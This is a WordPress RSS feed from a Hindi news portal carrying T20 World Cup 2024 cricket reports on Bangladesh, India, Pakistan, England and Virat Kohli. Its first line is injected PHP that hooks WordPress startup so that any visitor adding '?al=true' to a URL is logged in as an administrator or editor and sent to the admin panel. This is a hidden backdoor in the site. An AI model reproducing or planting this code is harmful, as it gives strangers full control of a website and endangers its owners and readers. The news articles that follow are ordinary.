// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); टी20 विश्व कप – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Tue, 18 Jun 2024 10:16:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 बल्लेबाजों की फॉर्म को लेकर चिंतित हूं, पता नहीं ऐसा क्यों हो रहा है: शंटो https://pratyushaashakinayikiran.com/?p=42659 Tue, 18 Jun 2024 10:16:00 +0000 https://pratyushaashakinayikiran.com/?p=42659 किंग्सटाउन
 बांग्लादेश के कप्तान नजमुल हुसैन शंटो को खुशी है कि उनकी टीम टी20 विश्व कप के सुपर आठ में जगह बनाने में सफल रही लेकिन वह अपने बल्लेबाजों की खराब फॉर्म से निराश हैं और वह यह भी नहीं जानते कि उनके बल्लेबाज अच्छा प्रदर्शन क्यों नहीं कर पा रहे हैं।

बांग्लादेश ने नेपाल को 21 रन से हराकर सुपर आठ में जगह बनाई लेकिन उसकी टीम इस मैच में केवल 106 रन पर आउट हो गई थी जो चिंता का विषय है।

शंटो ने मैच के बाद संवाददाताओं से कहा, ‘‘हमें खुशी है कि हम सुपर आठ में खेलने जा रहे हैं लेकिन हमारे बल्लेबाज अभी तक अपेक्षित प्रदर्शन नहीं कर पाए हैं। हमारे गेंदबाजों ने हालांकि पिछले तीन-चार मैच में जिस तरह से गेंदबाजी की उससे वास्तव में मैं बहुत खुश हूं।’’ उन्होंने कहा, ‘‘मुझे उम्मीद है कि हमारे गेंदबाज अपनी यह फॉर्म बरकरार रखेंगे। बल्लेबाजी इकाई के रूप में हमें उचित रणनीति तैयार करनी होगी ताकि अगले दौर में हमारे बल्लेबाज वापसी कर सकें।’’

शंटो ने स्वीकार किया के वह नहीं जानते कि उनके बल्लेबाज अच्छा प्रदर्शन क्यों नहीं कर पा रहे हैं। उन्होंने हालांकि यह कहने से इनकार कर दिया कि धीमी पिच इसका कारण है। बांग्लादेश की टीम इस टूर्नामेंट में केवल एक बार नीदरलैंड के खिलाफ 150 रन से अधिक स्कोर बना पाई है।

शंटो ने कहा, ‘‘मैं उम्मीद कर रहा हूं कि हमारे गेंदबाज प्रत्येक मैच में हमें जीत दिलाएंगे लेकिन बल्लेबाजों को भी अपनी जिम्मेदारी समझनी होगी। बल्लेबाज अच्छा प्रदर्शन क्यों नहीं कर पा रहे हैं, हर कोई इसका पता लगाने की कोशिश कर रहा है। हम अच्छा प्रदर्शन नहीं कर पा रहे हैं और यह अस्वीकार्य है।’’

उन्होंने कहा, ‘‘विकेट कोई मसला नहीं है। यह ऐसा विकेट है जहां आप 140-150 रन बना सकते हैं। हम ऐसा नहीं कर पा रहे हैं और यह हमारे लिए चिंता का विषय है।’’ बांग्लादेश को सुपर आठ में भारत, ऑस्ट्रेलिया और अफगानिस्तान के साथ ग्रुप एक में रखा गया है। वह सुपर आठ में अपना पहला मैच गुरुवार को ऑस्ट्रेलिया के खिलाफ खेलेगा। इसके दो दिन बाद वह भारत से और 24 जून को अफगानिस्तान से भिड़ेगा।

 

]]>
अर्शदीप सिंह ने टी 20 विश्व कप में खास उपलब्धि हासिल करते हुए रविचंद्रन अश्विन के 10 साल पुराने रिकॉर्ड को तोड़ा https://pratyushaashakinayikiran.com/?p=40900 Thu, 13 Jun 2024 16:17:00 +0000 https://pratyushaashakinayikiran.com/?p=40900 न्यूयॉर्क
भारतीय तेज गेंदबाज अर्शदीप सिंह ने टी 20 विश्व कप में एक खास उपलब्धि हासिल करते हुए ऑफ स्पिनर रविचंद्रन अश्विन के 10 साल पुराने रिकॉर्ड को तोड़ दिया।  अर्शदीप ने चल रहे टी-20 विश्व कप 2024 में बुधवार को यूएसए के खिलाफ अपने 4 ओवरों में 9 रन देकर 4 विकेट लिए और अश्विन के दस साल पुराने रिकॉर्ड को तोड़ दिया। अश्विन ने 2014 में ऑस्ट्रेलिया के खिलाफ मीरपुर में 11 रन देकर 4 विकेट हासिल थे, जो भारत के लिए विश्व कप में उनका सर्वश्रेष्ठ आंकड़ा था। हरभजन सिंह तीसरे स्थान पर खिसक गए, जिन्होंने 2012 में कोलंबो में इंग्लैंड के खिलाफ 12 रन देकर 4 विकेट लिया था।

अर्शदीप को सबसे ज्यादा फायदा भारतीय कप्तान रोहित शर्मा के टॉस जीतकर गेंदबाजी करने के फैसले से मिला। उन्होंने खेल के पहले ही ओवर में यूएसए को दोहरा झटका दिया, जब उन्होंने शायन जहांगीर को शून्य पर और एंड्रीस गौस को 2 रन पर आउट कर दिया, जिससे मेजबान टीम दबाव में आ गई। हालांकि इसके बाद स्टीवन टेलर और नितीश कुमार ने यूएसए को मैच में वापसी दिलाई, रोहित यहां फिर से अर्शदीप को आक्रमण पर वापस लाए और उन्होंने खतरनाक बल्लेबाज नितीश को 27 रन पर आउट कर दिया, जिससे यूएसए की टीम ने 81 रनों पर 5 विकेट खो दिये। अर्शदीप ने हरमीत सिंह को आउट कर मैच में अपना चौथा विकेट लिया और उन्होंने 4/9 के आंकड़े के साथ अपने स्पैल का समापन किया।

आखिरी ओवर में, यूएसए के बल्लेबाज जसदीप सिंह और शैडली वान शल्कविक 7 रन बनाकर अपनी टीम का स्कोर 110/8 तक ले गए। जवाब में भारत ने विराट कोहली (00), रोहित शर्मा (03) और ऋषभ पंत (18) के विकेट केवल 39 रनों पर खो दिये। यहां से सूर्यकुमार यादव (50 रन, 49 गेंद 2 चौके और 2 छक्के) के नाबाद अर्धशतक और शिवम दुबे (नाबाद 31 रन, 35 गेंद, 1 चौका और 1 छक्का) की बेहतरीन पारी की बदौलत भारत ने 18.2 ओवर में 3 विकेट के नुकसान पर लक्ष्य हासिल कर लिया।

 

]]>
इंग्लैंड के अरमानों पर पानी फेर सकती है बारिश https://pratyushaashakinayikiran.com/?p=40743 Thu, 13 Jun 2024 05:36:00 +0000 https://pratyushaashakinayikiran.com/?p=40743 इंग्लैंड के अरमानों पर पानी फेर सकती है बारिश

उम्मीदें जीवंत रखने के लिए एक दूसरे का सामना करेंगे बांग्लादेश और नीदरलैंड

करो या मरो मुकाबले में न्यूजीलैंड का सामना वेस्टइंडीज से

नॉर्थ साउंड
 अपनी पहली जीत दर्ज करने के लिए बेताब इंग्लैंड के अरमानों पर ओमान के खिलाफ यहां होने वाले टी20 विश्व कप के मैच में बारिश पानी फेर सकती है।

पूर्व चैंपियन इंग्लैंड को सुपर 8 में जगह बनाने के लिए ग्रुप बी के अपने बाकी बचे दोनों मैच में हर हाल में जीत दर्ज करनी होगी। उसका दो मैच में केवल एक अंक है जो उसे स्कॉटलैंड के खिलाफ बारिश के कारण मैच नहीं हो पाने के कारण मिला था।

जोस बटलर की अगुवाई वाली टीम के लिए खबर अच्छी नहीं है क्योंकि मौसम विभाग ने ओमान के खिलाफ मैच के दिन बारिश की संभावना व्यक्त की है।

इंग्लैंड को ओमान के बाद अपना आखिरी लीग मैच इसी मैदान पर नामीबिया के खिलाफ खेलना है। इन दोनों मैच में जीत के बावजूद भी इंग्लैंड को ऑस्ट्रेलिया और स्कॉटलैंड के बीच होने वाले मैच में अनुकूल परिणाम के लिए दुआ करनी होगी।

ऑस्ट्रेलिया लगातार तीन मैच में जीत से सुपर 8 में अपनी जगह पक्की कर चुका है। स्कॉटलैंड तीन मैच में पांच अंक लेकर दूसरे स्थान पर है और अगर वह अपने अंतिम मैच में ऑस्ट्रेलिया को हरा देता है तो उसके सात अंक हो जाएंगे और वह सुपर 8 में जगह बना देगा। इसलिए इंग्लैंड इस मैच में ऑस्ट्रेलिया की जीत की दुआ करेगा।

जहां तक ओमान का सवाल है तो उसने अभी तक अपने तीनों मैच गंवाए हैं और वह अगले दौर में जगह बनाने की दौड़ से बाहर हो चुका है।

टीम इस प्रकार हैं:

इंग्लैंड: जोस बटलर (कप्तान), मोइन अली, जोफ्रा आर्चर, जोनाथन बेयरस्टो, हैरी ब्रूक, सैम करन, बेन डकेट, टॉम हार्टले, विल जैक्स, क्रिस जॉर्डन, लियाम लिविंगस्टोन, आदिल राशिद, फिल साल्ट, रीस टॉपले और मार्क वुड।

ओमान: आकिब इलियास (कप्तान), जीशान मकसूद, कश्यप प्रजापति, प्रतीक अठावले, अयान खान, शोएब खान, मोहम्मद नदीम, नसीम खुशी, मेहरान खान, बिलाल खान, रफीउल्लाह, कलीमुल्लाह, फैयाज बट, शकील अहमद और खालिद कैल।

मैच शुरू: भारतीय समयानुसार शुक्रवार रात 12.30 बजे से।

उम्मीदें जीवंत रखने के लिए एक दूसरे का सामना करेंगे बांग्लादेश और नीदरलैंड

 बांग्लादेश और न्यूजीलैंड टी20 विश्व कप के सुपर आठ में पहुंचने की अपनी उम्मीदों को पंख लगाने के लिए गुरुवार को यहां एक दूसरे का सामना करेंगे।

दक्षिण अफ्रीका ग्रुप डी से शीर्ष पर रहकर पहले ही अगले दौर में जगह बना चुका है। बांग्लादेश इस ग्रुप में अभी दूसरे स्थान पर है। उसके और नीदरलैंड के समान दो दो अंक हैं। बांग्लादेश की टीम हालांकि बेहतर नेट रन रेट के आधार पर दूसरे स्थान पर है।

नेपाल और श्रीलंका के एक-एक अंक हैं लेकिन उनके पास भी ग्रुप में दूसरे स्थान पर रहकर सुपर 8 में जगह बनाने का मौका है।

बांग्लादेश ने अपने पहले मैच में श्रीलंका को दो विकेट से हराया था लेकिन दक्षिण अफ्रीका के खिलाफ उसके बल्लेबाज अपेक्षाकृत छोटा लक्ष्य हासिल करने में नाकाम रहे थे और उसे चार रन से हार का सामना करना पड़ा था।

नीदरलैंड की टीम भी पिछले मैच में दक्षिण अफ्रीका से हार गई थी और वह भी वापसी करने के उद्देश्य से मैदान पर उतरेगी।

टीम इस प्रकार हैं:

बांग्लादेश: नजमुल हुसैन शंटो (कप्तान), तस्कीन अहमद, लिटन दास, सौम्या सरकार, तनजीद हसन तमीम, शाकिब अल हसन, तौहीद हृदोय, महमूद उल्लाह रियाद, जैकर अली अनिक, तनवीर इस्लाम, शाक महेदी हसन, रिशाद हुसैन, मुस्तफिजुर रहमान, शोरीफुल इस्लाम और तनजीम हसन साकिब।

नीदरलैंड: स्कॉट एडवर्ड्स (कप्तान), आर्यन दत्त, बास डी लीडे, काइल क्लेन, लोगन वैन बीक, मैक्स ओ’डॉड, माइकल लेविट, पॉल वैन मीकेरेन, रयान क्लेन, साकिब जुल्फिकार, सिब्रांड एंजेलब्रेच, तेजा निदामनुरु, टिम प्रिंगल, विक्रम सिंह, विव किंगमा और वेस्ले बैरेसी।

मैच शुरू: भारतीय समयानुसार रात 8 बजे से।

 

करो या मरो मुकाबले में न्यूजीलैंड का सामना वेस्टइंडीज से

न्यूजीलैंड को अगर टी20 विश्व कप में अपनी उम्मीदें जीवंत रखनी हैं तो उसे मेजबान वेस्टइंडीज के खिलाफ यहां होने वाले करो या मरो मैच में बेहतर प्रदर्शन करके हर हाल में जीत दर्ज करनी होगी।

अफगानिस्तान के खिलाफ पिछले मैच में न्यूजीलैंड के बल्लेबाज नहीं चल पाए थे और उसकी पूरी टीम 15.2 ओवर में 75 रन पर आउट हो गई जिससे उसे 84 रन से हार का सामना करना पड़ा। इससे उसका नेट रन रेट भी गड़बड़ा गया और वह ग्रुप सी में सबसे निचले स्थान पर है।

न्यूजीलैंड का विश्व कप में प्रदर्शन बहुत अच्छा रहा है। वह पिछले तीन वनडे विश्व कप और तीन टी20 विश्व कप के सेमीफाइनल में पहुंचा है लेकिन इस बार उसके लिए चुनौती आसान नहीं है।

अफगानिस्तान के खिलाफ उसके केवल दो बल्लेबाज दोहरे अंक में पहुंच पाए थे। केन विलियमसन की अगुवाई वाली टीम को अब उस प्रदर्शन को भूलकर वेस्टइंडीज के खिलाफ अच्छा खेल दिखाना होगा।

पिछले मैच में न्यूजीलैंड को केवल बल्लेबाजी में ही नहीं क्षेत्ररक्षण में भी निराशा हाथ लगी। उसने आसान कैच टपकाए और स्टंप आउट करने के मौके गंवाए। अफगानिस्तान ने इसका फायदा उठाकर मजबूत स्कोर खड़ा किया।

वेस्टइंडीज के साथ ऐसी कोई दिक्कत नहीं है और लगातार तीसरी जीत से वह सुपर 8 में अपनी जगह पक्की कर लेगा।

पापुआ न्यू गिनी के खिलाफ वेस्टइंडीज को आसान जीत नहीं मिली लेकिन पिछले मैच में युगांडा को उसने 39 रन पर आउट करके 134 रन की बड़ी जीत दर्ज की थी ।

टीम इस प्रकार हैं:

वेस्टइंडीज : रोवमैन पॉवेल (कप्तान), ब्रैंडन किंग, जॉनसन चार्ल्स, निकोलस पूरन (विकेट कीपर), शेरफेन रदरफोर्ड, आंद्रे रसेल, रोमारियो शेफर्ड, रोस्टन चेस, अकील होसेन, अल्जारी जोसेफ, गुडाकेश मोटी, ओबेद मैककॉय, शमर जोसेफ, शिमरॉन हेटमायर और शाई होप।

न्यूजीलैंड: केन विलियमसन (कप्तान), फिन एलन, डेवोन कॉनवे (विकेट कीपर), डेरिल मिशेल, ग्लेन फिलिप्स, मार्क चैपमैन, माइकल ब्रेसवेल, मिशेल सेंटनर, मैट हेनरी, लॉकी फर्ग्यूसन, ट्रेंट बोल्ट, टिम साउथी, ईश सोढ़ी, जेम्स नीशम और रचिन रवींद्र।

मैच शुरू: भारतीय समयानुसार सुबह 6 बजे।

 

]]>
भारत vs पाकिस्तान के मैच पर बारिश का साया, रद्द हुआ तो पाक ले जाएगा फायदा https://pratyushaashakinayikiran.com/?p=39273 Sat, 08 Jun 2024 20:57:00 +0000 https://pratyushaashakinayikiran.com/?p=39273 नूयार्क
आईसीसी पुरुष टी20 विश्व कप 2024 का बड़ा मुकाबला 9 जून को नासाउ काउंटी इंटरनेशनल क्रिकेट स्टेडियम में होना है। लेकिन मैच से पहले मौसम विभाग ने चेतावनी दे दी है कि मैच के दौरान बारिश की संभावना है। मौसम विभाग की मानें तो रविवार को पूरे दिन न्यूयॉर्क में बारिश हो सकती है। न्यूयॉर्क में तब सुबह 10:30 बजे होंगे वहीं, भारतीय समयानुसार रात 8 बजे होंगे। मौसम पूर्वानुमान वेबसाइट एक्यूवेदर पर 9 जून को सुबह 11 बजे के बाद बारिश की 50 प्रतिशत से अधिक संभावना है जोकि शाम चार बजे तक जारी रह सकती है।

मैच धुलने से पाकिस्तान को होगा फायदा
अगर मैच वॉशआउट हो गया तो इससे पाकिस्तान को जीवनदान मिलेगा, जो अपना पहला मैच अमेरिका से हार गया था। खेल रद्द होने से भारत और पाकिस्तान दोनों में 1-1 बंट जाएंगे। इससे वह अमेरिका को टक्कर दे सकती है। यूएसए ने अब तक दो मुकाबले (बनाम कनाडा और पाकिस्तान) जीते हैं। उनके आगामी मुकाबले आयरलैंड और कनाडा से होने हैं। अगर वह इनमें से एक मुकाबला हार गया तो पाकिस्तान आगामी दो मुकाबले जीतकर सुपर 8 की दावेदारी पक्का कर सकता है। भारत के बाद पाकिस्तान को कनाडा और आयरलैंड से भिड़ना है और कमजोर टीमों के खिलाफ पाकिस्तान की जीत पक्की हो सकती है। अगर पाकिस्तान भारत से हार जाता तो उन्हें सीधा नुकसान होना था पर अंक बंटने से उन्हें थोड़ा फायदा मिलने की संभावना बन जाएगी।

भारत को तेज गेंदबाजों पर भरोसा
आयरलैंड के खिलाफ अपने पिछले मैच में संभावना थी कि भारत 4 स्पिनरों के साथ खेल सकता है। हालांकि, भारतीय कप्तान रोहित शर्मा ने पिच को देखकर दो स्पिनर और तीन तेज गेंदबाजों को उतारे। भारत के लिए यह दाव सही गया और भारत ने आयरलैंड को 96 रन पर सिमेटकर मैच अपने नाम कर लिया। भारत के लिए तेज गेंदबाज मैच में 8 विकेट लेने में सफल रहे। हार्दिक पांड्या ने तीन तो अर्शदीप और शिवम दुबे ने 2-2 विकेट लिए। यही प्लेइंग 11 पाकिस्तान के खिलाफ भी खेल सकती है। इस कारण कुलदीप यादव, जायसवाल, युजी चहल को अभी इंतजार करना पड़ेगा।

 दोनों टीमों की संभावित प्लेइंग 11
भारत : रोहित शर्मा (कप्तान), विराट कोहली, ऋषभ पंत (विकेटकीपर), सूर्यकुमार यादव, शिवम दुबे, हार्दिक पंड्या, रवींद्र जड़ेजा, अक्षर पटेल, जसप्रीत बुमराह, अर्शदीप सिंह, मोहम्मद सिराज
पाकिस्तान : बाबर आजम (कप्तान), अबरार अहमद, आजम खान, फखर जमान, हारिस रऊफ, इफ्तिखार अहमद, इमाद वसीम, मोहम्मद अब्बास अफरीदी, मोहम्मद आमिर, मोहम्मद रिजवान, नसीम शाह, सईम अयूब, शादाब खान, शाहीन शाह अफरीदी, उस्मान खान
 

 

]]>
पाक क्रिकेट टीम को टी20 विश्व कप के अपने पहले मैच में हार का सामना करना पड़ा, बेंच पर बैठे इन खिलाड़ियों को मिलेगा मौका https://pratyushaashakinayikiran.com/?p=39196 Sat, 08 Jun 2024 17:25:00 +0000 https://pratyushaashakinayikiran.com/?p=39196 नूयार्क
पाकिस्तान क्रिकेट टीम को टी20 विश्व कप के अपने पहले मैच में हार का सामना करना पड़ा है। यूएसए ने पाकिस्तान को सुपर ओवर में हराया। इस जीत से यूएसए की हर कोई तारीफ कर रहा है, जबकि दूसरी तरफ पाकिस्तान की जमकर किरकिरी हुई है। पाकिस्तान को अपना अगला मुकाबला भारत से खेलना है, जोकि टीम के लिए हर हाल में जीतना जरूरी हो गया है। यूएसए की टीम दो मैच जीतकर ग्रुप ए में शीर्ष पर है और अगर भारत पाकिस्तान के खिलाफ जीतने में कामयाब होता है तो पाकिस्तान के लिए अगले राउंड में पहुंचने की राह मुश्किल हो जाएगी। इसी वजह से पाकिस्तान की टीम अपने अगले मुकाबले के लिए प्लेइंग इलेवन में बड़े बदलाव कर सकती है।

अमेरिका के खिलाफ मुकाबले में टीम के कई बल्लेबाजों का प्रदर्शन निराशाजनक रहा। गेंदबाजों ने अच्छा प्रदर्शन किया लेकिन ज्यादा दबाव नहीं बना सके, जिसके कारण उम्मीद की जा रही है कि भारत के खिलाफ पाकिस्तान की टीम अंतिम-11 में बदलाव कर सकती है। मीडिया रिपोर्ट के मुताबिक अबरार अहमद, इमाद वसीम और सईम आयूब को प्लेइंग इलेवन में मौका दिया जा सकता है। इन तीनों को शामिल किया जा सकता है या इनमें से दो खिलाड़ियों की एंट्री हो सकती है।

ऑलराउंडर इमाद वसीम मांसपेशियों में खिंचाव के कारण गुरुवार को अमेरिका के खिलाफ हुए पाकिस्तान के टी20 विश्व कप के पहले मुकाबले में नहीं खेल पाए थे। बाबर ने कहा था कि वसीम मांसपेशियों में खिंचाव से पूरी तरह से नहीं उबर पाए हैं और बाएं हाथ के इस स्पिनर की प्रगति पर नजर रखी जा रही है। विश्व कप को ध्यान में रखते हुए इस अनुभवी टी20 विशेषज्ञ खिलाड़ी को संन्यास से वापसी कराई गई। चयनकर्ताओं का मानना है कि उनकी शैली की गेंदबाजी अमेरिका और वेस्टइंडीज की धीमी प्रकृति की पिचों के अनुकूल होगी।
 
वसीम के अलावा बाएं हाथ के तेज गेंदबाज मोहम्मद आमिर को भी टी20 विश्व कप के लिए पाकिस्तान की टीम में चुना गया है लेकिन इस टूर्नामेंट से पहले न्यूजीलैंड, आयरलैंड और इंग्लैंड के खिलाफ सीरीज के लिए उनका इस्तेमाल काफी एहतियात के साथ किया गया।

 

]]>
बीच के ओवरों में पाकिस्तान के स्ट्राइक रेट से चिंतित अफरीदी, टीम के फाइनल में पहुंचने का यकीन https://pratyushaashakinayikiran.com/?p=34498 Sun, 26 May 2024 15:25:00 +0000 https://pratyushaashakinayikiran.com/?p=34498 दुबई
पूर्व कप्तान शाहिद अफरीदी को यकीन है कि पाकिस्तान एक बार फिर टी20 विश्व कप के फाइनल में पहुंचेगा लेकिन बीच के ओवरों में बल्लेबाजों के खराब स्ट्राइक रेट पर उन्होंने चिंता जताई। पूर्व हरफनमौला ने कहा कि शाहीन शाह अफरीदी, नसीम शाह, हारिस रऊफ, मोहम्मद आमिर और अब्बास अफरीदी जैसे गेंदबाजों के रहते पाकिस्तान के पास दुनिया का सर्वश्रेष्ठ तेज आक्रमण है।

टी20 विश्व कप के टूर्नामेंट दूत अफरीदी ने आईसीसी से कहा, ‘‘मुझे हमारे बल्लेबाजों के स्ट्राइक रेट को लेकर चिंता है। खासकर सातवें से 13वें ओवर के बीच।’’ उन्होंने कहा, ‘‘उम्मीद है कि इसमें सुधार होगा। आठ से नौ रन प्रति ओवर बनने चाहिये। पाकिस्तान मेरी नजर में खिताब की प्रबल दावेदार है।’’

पाकिस्तान की 2009 विश्व कप विजेता टीम के सदस्य अफरीदी का मानना है कि तेज गेंदबाजों पर बडी जिम्मेदारी होगी। उन्होंने कहा, ‘‘मुझे लगता है कि पाकिस्तान फाइनल में पहुंचेगा चूंकि वेस्टइंडीज और अमेरिका के हालात हमारी टीम को रास आयेंगे। किसी और टीम के पास इतना मजबूत गेंदबाजी आक्रमण भी नहीं है। हमारे तेज गेंदबाज कमाल के हैं। इन सभी गेंदबाजों पर बड़ी जिम्मेदारी है।’’

पाकिस्तान को पिछली बार फाइनल में इंग्लैंड ने पांच विकेट से हराया था। अफरीदी ने आगे कहा, ‘‘टीम के सभी खिलाड़ी अहम हैं लेकिन पिछले कुछ समय में बाबर आजम, मोहम्मद रिजवान, फखर जमां, शाहीन, नसीम शाह, हारिस रऊफ , शादाब खान ने महत्वपूर्ण भूमिका निभाई है। मुझे अगर एक को चुनना है तो मैं बाबर को चुनूंगा। वह कप्तान है और मैं चाहता हूं कि वह अच्छा खेले और अच्छे फैसले लेकर टीम को जीत दिलाये।’’ पाकिस्तान को ग्रुप ए में भारत, आयरलैंड, कनाडा और अमेरिका के साथ रखा गया है।

 

]]>
टी20 विश्व कप से पहले विराट कोहली का नया लुक आया सामने, हेयरस्टाइल किया चेंज, जल्द जुड़ेंगे भारतीय टीम से https://pratyushaashakinayikiran.com/?p=31896 Sat, 18 May 2024 17:17:00 +0000 https://pratyushaashakinayikiran.com/?p=31896 नई दिल्ली
स्टार बल्लेबाज विराट कोहली अगले महीने से वेस्टइंडीज और अमेरिका में होने वाले टी20 विश्व कप के लिए जल्द ही भारतीय टीम से जुड़ने वाले हैं। हालांकि इस समय वह आईपीएल में व्यस्त है। रॉयल चैलेंजर्स बेंगलुरु और चेन्नई सुपर किंग्स के बीच आईपीएल 2024 का एक अहम मुकाबला मुकाबला खेला जाएगा, जो भी टीम ये मैच जीतेगी, वह प्लेऑफ का टिकट कटाएगी। हालांकि मैच के दौरान बारिश होने की संभावना है, ऐसे में अगर बारिश की वजह से मैच पूरा नहीं हो सका तो चेन्नई सुपर किंग्स एक अंक लेकर प्लेऑफ के लिए क्वालीफाई कर जाएगी। इस बीच विराट कोहली का नया हेयरस्टाइल काफी वायरल हो रहा है।

एक स्टार क्रिकेटर होने के अलावा विराट कोहली फैशन की दुनिया में काफी नाम कमा चुके हैं। विराट कोहली सबसे स्टाइलिश भारतीय क्रिकेटरों में से एक माने जाते हैं। उनके हेयरस्टाइल की चर्चा काफी रहती है। सेलिब्रिटी स्टाइलिस्ट आलिम हकीम ने सोशल मीडिया पर विराट कोहली के नए हेयरस्टाइल की तस्वीरें शेयर की है।  सिर्फ कोहली ही नहीं, हकीम एमएस धोनी के लिए भी हेयरस्टाइल करते हैं। आलिम हकीम ने एक इंटरव्यू के दौरान बताया था कि हेयरकट का कितना चार्ज लेते हैं। उन्होंने ये नहीं बताया कि कोहली और धोनी से वह कितना चार्ज करते हैं लेकिन उन्होंने कहा कि एक लाख से इसकी शुरुआती होती है।

आईपीएल 2024 में विराट कोहली शानदार फॉर्म में हैं। रॉयल चैलेंजर्स बेंगलुरु के लिए खेलते हुए विराट कोहली ने 13 मैचों में 155 के स्ट्राइक रेट से 661 रन बनाए हैं। इस सीजन कोहली ने एक शतक और पांच अर्धशतक लगाए हैं। वह 600 से ज्यादा रन बनाने वाले एकमात्र बल्लेबाज हैं। आईपीएल में 8000 रन पूरा करने के लिए विराट कोहली को 76 और रनों की जरूरत है। किसी अन्य खिलाड़ी ने टी20 लीग में 7,000 रन भी नहीं बनाए हैं। चेन्नई सुपर किंग्स के खिलाफ करो या मरो मुकाबल में कोहली एक बार फिर बल्ले से कमाल दिखाना चाहेंगे। आरसीबी को ये मैच 18 रन से या 18वें ओवर के अंदर जीतना होगा, जिससे टीम प्लेऑफ के लिए क्वालीफाई कर सकेगी।

 

]]>